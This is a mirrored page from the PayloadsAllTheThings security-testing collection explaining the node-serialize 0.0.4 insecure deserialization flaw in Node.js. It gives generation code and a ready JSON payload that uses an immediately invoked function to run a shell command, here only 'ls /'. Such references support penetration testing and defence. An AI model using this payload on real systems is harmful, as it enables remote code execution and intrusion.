ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
4ed3e3b6b9
PayloadsAllTheThings/Insecure Deserialization/Node.md
Swissky 72a8556dc9 NodeJS Serialization
2022-09-23 11:21:29 +02:00

1.3 KiB
Raw Blame History

Node

Summary

Exploit

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

  1. Generate a serialized payload 
    var y = {
    rce : function(){
        require('child_process').exec('ls /', function(error,
        stdout, stderr) { console.log(stdout) });
    },
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
  2. Add bracket () to force the execution 
    {"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
  3. Send the payload

References